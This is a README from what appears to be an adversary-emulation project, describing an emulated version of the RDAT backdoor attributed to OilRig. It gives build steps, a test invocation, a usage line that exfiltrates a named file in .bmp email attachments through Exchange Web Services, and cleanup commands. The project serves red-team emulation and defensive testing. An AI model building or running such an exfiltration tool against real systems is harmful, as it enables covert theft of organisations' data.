Skip to content

Latest commit

 

History

History
 
 

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

RDAT

RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[1][2] This emulated version of RDAT will leverage the EWS API by loading Microsoft.Exchange.WebServices.dll. It will connect to the EWS email server and send emails with a .bmp that contains chunks of data from given file to be exfiltrated.

Microsoft.Exchange.WebServices.dll is not included by default in this repository. Follow Microsoft's documentation for retrieving the DLL from an existing installation of Exchange or for using the open source EWS Managed API. The DLL should be placed in Resources/RDAT for building the RDAT executable.

NOTE: Tests and usage assume an Exchange server has been configured for the environment and should be run from a domain joined Windows host with network access to the Exchange server. This implementation also expects a username and passowrd for a configured user that can authenticate to the Exchange server.

Build Instructions

Windows

Download .NET 6.0 SDK x64 for Windows

https://dotnet.microsoft.com/en-us/download/dotnet/6.0

Build EXE

Open a command (cmd.exe) prompt

# from \Resources\RDAT\

dotnet publish -c Release -r win10-x64 -p:PublishSingleFile=true /p:DebugType=None /p:DebugSymbols=false
cd .\bin\Release\net6.0\win10-x64\publish\

The compiled binary should be copied to Resources\payloads\TwoFace for Step 8 and 10.

Test Instructions

Open a command (cmd.exe) prompt

# from \Resources\RDAT\

powershell.exe .\test.ps1 [user] [password] [domain] [server_address] # Order has to be exact
# Example: powershell.exe .\test.ps1 user_account 1234567 domain.com 10.0.0.1

Usage Examples

Go to running directory of RDAT.exe

.\RDAT.exe --help
.\RDAT.exe --path="C:\Users\Public\FileToBeExfiltrated.txt" --from="[email protected]" --password="1234567" --to="[email protected]" --server="10.0.0.1" --chunksize="20000" 

Cleanup Instructions

Go to running directory of RDAT.exe

rm .\RDAT.exe
rm .\guest.bmp
rm .\guest.bmp.tmp

CTI Evidence

[1] https://attack.mitre.org/software/S0495/ [2] https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/